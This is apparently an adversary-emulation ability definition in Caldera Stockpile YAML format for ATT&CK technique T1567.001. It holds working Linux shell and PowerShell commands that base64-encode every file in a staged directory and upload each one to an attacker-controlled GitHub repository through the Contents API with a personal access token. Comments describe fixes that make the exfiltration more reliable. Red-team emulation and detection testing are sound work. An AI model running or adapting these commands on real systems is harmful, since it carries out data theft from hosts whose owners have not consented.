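- id: a201bec2-a193-4b58-bf0e-57fa621da474
  name: Exfil Directory Files to GitHub
  description: |
    This ability will exfiltrate all files in a set staged directory to a repository in GitHub.
    Each regular file in host.dir.staged is base64-encoded and committed through the
    GitHub Contents API (PUT /repos/{user}/{repo}/contents/{path}) to the configured branch,
    under a timestamped name that embeds the agent paw. Sub-directories are skipped.
    The PAT is supplied as a fact and is sent as an Authorization header only.
  tactic: exfiltration
  technique:
    attack_id: T1567.001
    name: Exfiltration to Code Repository
  platforms:
    linux:
      sh:
        # Notes on the sh variant:
        # - all paths are quoted so a staged directory containing spaces still works
        # - the request body is built in a mktemp() file (created 0600) rather than the
        #   fixed, predictable /tmp/b64, which was open to a symlink/race and to any local
        #   user reading the staged content before curl picked it up
        # - "$LocalDirectory"/* with an -f guard uploads every regular file, matching the
        #   description and the Windows variant (the old *.* glob skipped dot-less names)
        # - file names are not JSON-escaped; a name containing '"' or '\' still breaks the body
        command: |
          GHUser="#{github.user.name}";
          GHRepo="#{github.repository.name}";
          GHPAT="#{github.access.token}";
          GHBranch='#{github.repository.branch}';
          LocalDirectory="#{host.dir.staged}";
          Header="Authorization: token $GHPAT";
          TmpBody=$(mktemp) || exit 1;
          for file in "$LocalDirectory"/*; do
            [ -f "$file" ] || continue;
            TempName=$(basename "$file" | sed "s/ /-/g");
            RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$TempName";
            printf '{"message":"Committed %s at: %s", "branch":"%s", "content":"' "$TempName" "$(date)" "$GHBranch" >"$TmpBody";
            base64 -w 0 "$file" >>"$TmpBody";
            printf '"}' >>"$TmpBody";
            content=$(curl -s -X PUT -H "Accept: application/vnd.github.v3+json" -H "$Header" "https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName" -d @"$TmpBody");
          done;
          rm -f "$TmpBody";
    windows:
      psh,pwsh:
        # Notes on the PowerShell variant:
        # - the timestamp format is yyyyMMddHHmmss: the previous yyyymmddhhmmss used the
        #   minute field (mm) for the month and a 12-hour clock (hh), so names did not sort
        #   by date and could collide across AM/PM; the Linux side already used %m/%H
        # - [System.IO.File]::ReadAllBytes replaces Get-Content -Encoding Byte, which does
        #   not exist in pwsh (6+) even though this executor is declared for psh and pwsh
        # - Get-ChildItem -File skips sub-directories, which Get-Content could not read
        # - the Basic credential is built from ASCII bytes explicitly instead of relying on
        #   PowerShell's implicit char[] -> byte[] coercion
        # - the retry on "but expected" is kept as-is; it re-issues the same PUT once
        command: |
          $GHUser = "#{github.user.name}";
          $GHRepo = "#{github.repository.name}";
          $GHPAT = "#{github.access.token}";
          $GHBranch = '#{github.repository.branch}';
          $LocalDirectory = "#{host.dir.staged}";
          $token = $GHUser + ":" + $GHPAT;
          $basetoken = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($token));
          $Headers = @{
            Authorization = 'Basic {0}' -f $basetoken;
          };
          $Files = Get-ChildItem -Path $LocalDirectory -File;
          foreach ($file in $Files){
            $RemoteName = "$(Get-Date -Format yyyyMMddHHmmss)-exfil-#{paw}-$($file.Name)";
            $uri = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $RemoteName;
            $FileBytes = [System.IO.File]::ReadAllBytes($file.FullName);
            $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);
            $Body = @{
              path = $file.Name;
              branch = $GHBranch;
              content = $Base64EncodedFileBytes;
              encoding = 'base64';
              message = "Committed " + $file.Name + " at: " + (Get-Date);
            } | ConvertTo-Json;
            try {
              $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;
            } catch {
              if ($PSItem -notmatch "but expected") { $PSItem; }
              else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }
            }
          };
  requirements:
    # Only run when host.dir.staged was collected by this same agent (paw).
    - plugins.stockpile.app.requirements.paw_provenance:
      - source: host.dir.staged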